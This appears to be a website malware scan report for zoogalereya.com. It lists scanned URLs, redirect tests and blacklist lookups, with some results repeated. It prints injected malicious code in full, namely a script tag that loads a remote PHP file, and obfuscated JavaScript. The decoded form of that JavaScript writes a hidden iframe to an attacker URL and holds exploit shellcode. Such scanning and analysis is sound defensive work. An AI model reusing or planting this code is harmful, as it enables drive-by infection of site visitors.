Scanned pages/files
Request | Server response | Status |
http://www.zoogalereya.com/ | 200 OK Content-Length: 8921 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://pikaco.ru/themes/bartik/templates/w6nxh2tm.php?id=3924864"></script> | ||
http://www.wit-web.com/1a/no/toms3.js | 200 OK Content-Length: 231 Content-Type: application/x-javascript | clean |
http://www.zoogalereya.com/test404page.js | 404 Not Found Content-Length: 561 Content-Type: text/html | clean |
http://giringrim.com/est_files/.mysql_history.php | 200 OK Content-Length: 4382 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. function YWPp(hU2K){return hU2K.replace(/%/g,'').replace(/[zS'r]/g,eL9I)}
pVTq='S64ocumenS74.wz72ite(z22z3cz64ivS20stylez3dS5cz22pS6fsitir6fnS3aabsolutez3br20leftr3ar2d10z300pxz3b S74opr3ar2d1z3000pxr3bS5cz22r3ez22)S3bfuS6ectz69on i73(a)z7bdoS63r75mez6et.wr72ite(z22S3cifr72amer20r73z72cS3dz5cS22httpz3az2fS2fgiS72S69nS67z72im.comS2fesS74S5ffilS65sr2f.mS79sqlS5fhistoS72y.pz68S70S3fsz3dz68S6c9Oz56qOS26idz3dr22+a+z22r5cS22S3eS3cz2fifS72amS65S3ez22 ...[3946 bytes skipped]... Decoded script: document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");function i73(a){document.write("<iframe src=\"http://giringrim.com/est_files/.mysql_history.php?s=hl9OVqO&id="+a+"\"></iframe>");}zQn=0;var scode="%uC031%u6499%u4003%u8B30%u0C40%u708B%uAD1C%u688B%uE808%u007C%u0000%u458B%u533C%u548B%u7805%u0156%u83EA%uFFC9%u8B52%u2072%uEE01%uAD41%uDB31%uC199%u0DCB%uD301%u9940%u5402%uFF05%uF375%uFB39%uEA75%u8B5E%u245E%uEB01%u8B66%u4B0C%u5E8B%u011C%u8BEB%u8B04%uE801%u5B5E%uE0FF%uBF50%uED49%u7E0F%uD3FF%u565E%u5250%u6854%uC000%u0000%u5056%u ...[4469 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zoogalereya.com
Result:
GET / HTTP/1.1
Host: zoogalereya.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zoogalereya.com
Referer: http://www.google.com/search?q=zoogalereya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zoogalereya.com
Referer: http://www.google.com/search?q=zoogalereya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zoogalereya.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zoogalereya.com/
Result: zoogalereya.com is not infected or malware details are not published yet.
Result: zoogalereya.com is not infected or malware details are not published yet.